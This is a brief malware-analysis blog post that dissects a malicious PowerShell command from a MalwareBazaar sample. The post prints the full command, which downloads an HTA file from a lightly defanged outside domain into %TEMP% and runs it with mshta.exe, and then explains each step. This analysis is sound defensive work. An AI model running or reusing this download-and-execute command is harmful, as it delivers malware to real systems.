Analysis Malicious Powershell ( Part 4 )

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
quality 7/10 · good
0 net
Tags
powershell malware
Analysis Malicious Powershell ( Part 4 ) Skip to main content Analysis Malicious Powershell ( Part 4 ) By Diyar Saadi | WIN32 July 15, 2025 In this article, we will briefly analyze the PowerShell script that downloads an hta file. Malware Sample : https://bazaar.abuse.ch/sample/d8f771c6ae73553fbbbf3d1bd0c19facaf69db4bc9663928789a970ca3e39f8b/. Malicious Code : powershell -Command "iwr [http]://booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta"; Start-Process mshta.exe -FilePath "$env:TEMP\x.hta"" Malicious Code Analysis : 1 - powershell -Command : Malware Developer uses powershell with a command argument and to execute a specific command . 2- iwr http[://]booknsvrf[.]com/ -OutFile "$env:TEMP\x.hta : Malware Developer uses Invoke-WebRequest to interact with a requesting with a web and download a malicious .hta file . in addition this .hta file will drop into %TEMP% folder . 3- Start-Process mshta.exe -FilePath "$env:TEMP\x.hta"" : Malware Developer start using mshta.exe that is a executable file in windows to run .hta file . in addition with the file path of downloaded .hta file from http[://]booknsvrf[.]com/ . Comments Post a Comment
← Back to stories